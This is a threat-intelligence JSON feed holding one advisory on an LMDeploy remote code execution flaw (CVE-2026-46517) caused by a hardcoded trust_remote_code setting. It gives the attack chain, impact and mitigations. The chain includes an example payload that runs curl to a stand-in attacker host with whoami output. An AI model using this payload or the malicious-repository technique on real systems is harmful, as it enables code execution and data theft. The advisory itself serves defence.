{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/lmdeploy/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["transformers","lmdeploy"],"_cs_severities":["medium"],"_cs_tags":["remote code execution","supply chain","lmdeploy"],"_cs_type":"advisory","_cs_vendors":["Hugging Face","InternLM"],"content_html":"\u003cp\u003eLMDeploy, a toolkit for large model deployment, is vulnerable due to its hardcoded \u003ccode\u003etrust_remote_code=True\u003c/code\u003e setting within the \u003ccode\u003etransformers.AutoConfig.from_pretrained()\u003c/code\u003e function calls. This bypasses the default-secure stance of Hugging Face Transformers (≥ 4.30) and allows arbitrary Python code execution when a user loads a model from a malicious Hugging Face repository. Specifically, this issue affects users running \u003ccode\u003elmdeploy serve api_server\u003c/code\u003e, \u003ccode\u003elmdeploy lite calibrate\u003c/code\u003e, or other related commands against untrusted repositories. The vulnerability stems from the lack of user control over the \u003ccode\u003etrust_remote_code\u003c/code\u003e parameter, and is tracked as CVE-2026-46517. The affected version is lmdeploy \u0026lt;= 0.12.3.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker creates a malicious Hugging Face repository containing a \u003ccode\u003econfig.json\u003c/code\u003e file with an \u003ccode\u003eauto_map\u003c/code\u003e key pointing to a custom \u003ccode\u003econfiguration_evil.py\u003c/code\u003e file.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003econfiguration_evil.py\u003c/code\u003e file contains malicious Python code, such as \u003ccode\u003eos.system(\u0026quot;curl https://attacker/?$(whoami)\u0026quot;)\u003c/code\u003e, designed to execute when imported.\u003c/li\u003e\n\u003cli\u003eA user, following a tutorial or benchmarking models, runs an lmdeploy command such as \u003ccode\u003elmdeploy serve api_server \u0026lt;attacker_repo\u0026gt;\u003c/code\u003e or \u003ccode\u003elmdeploy lite calibrate \u0026lt;attacker_repo\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eLMDeploy calls \u003ccode\u003etransformers.AutoConfig.from_pretrained(model_path, trust_remote_code=True)\u003c/code\u003e due to the hardcoded \u003ccode\u003etrust_remote_code=True\u003c/code\u003e in \u003ccode\u003elmdeploy/archs.py\u003c/code\u003e, \u003ccode\u003elmdeploy/lite/apis/calibrate.py\u003c/code\u003e, and \u003ccode\u003elmdeploy/lite/utils/load.py\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eHugging Face Transformers downloads the \u003ccode\u003econfiguration_evil.py\u003c/code\u003e file from the malicious repository.\u003c/li\u003e\n\u003cli\u003eHugging Face Transformers imports the \u003ccode\u003econfiguration_evil.py\u003c/code\u003e module, causing the malicious Python code to execute.\u003c/li\u003e\n\u003cli\u003eThe attacker gains code execution on the user\u0026rsquo;s machine with the privileges of the lmdeploy process.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform actions such as stealing credentials, installing malware, or compromising the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows an attacker to execute arbitrary code on the victim\u0026rsquo;s machine. The impact includes potential data theft, system compromise, and further propagation of the attack. This vulnerability affects any user of LMDeploy who loads models from untrusted sources, impacting casual users, CI pipelines, and researchers. The vulnerability exists because LMDeploy overrides Hugging Face\u0026rsquo;s default-secure stance without providing any warning or opt-out mechanism to the user.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to a patched version of LMDeploy that includes a CLI flag for \u003ccode\u003e--trust-remote-code\u003c/code\u003e defaulting to False, as described in the Suggested fix section.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect LMDeploy Remote Code Execution via Configuration File Import\u003c/code\u003e to detect potential exploitation attempts by monitoring process creation events related to Python and file paths from the Hugging Face cache.\u003c/li\u003e\n\u003cli\u003eExercise extreme caution when loading models from untrusted Hugging Face repositories with LMDeploy, and avoid running LMDeploy commands against repositories that have not been thoroughly vetted.\u003c/li\u003e\n\u003cli\u003eMonitor network connections initiated by Python processes originating from the Hugging Face Transformers cache directory, using a network connection monitoring rule.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-21T19:34:00Z","date_published":"2026-05-21T19:34:00Z","id":"https://feed.craftedsignal.io/briefs/2026-05-lmdeploy-rce/","summary":"LMDeploy \u003c= 0.12.3 is vulnerable to remote code execution (CVE-2026-46517) because it hardcodes `trust_remote_code=True` when calling `transformers.AutoConfig.from_pretrained()`, allowing a malicious Hugging Face repository to execute arbitrary Python code when loaded without user opt-out.","title":"LMDeploy Hardcoded trust_remote_code Enables Remote Code Execution (CVE-2026-46517)","url":"https://feed.craftedsignal.io/briefs/2026-05-lmdeploy-rce/"}],"language":"en","title":"CraftedSignal Threat Feed — Lmdeploy","version":"https://jsonfeed.org/version/1.1"}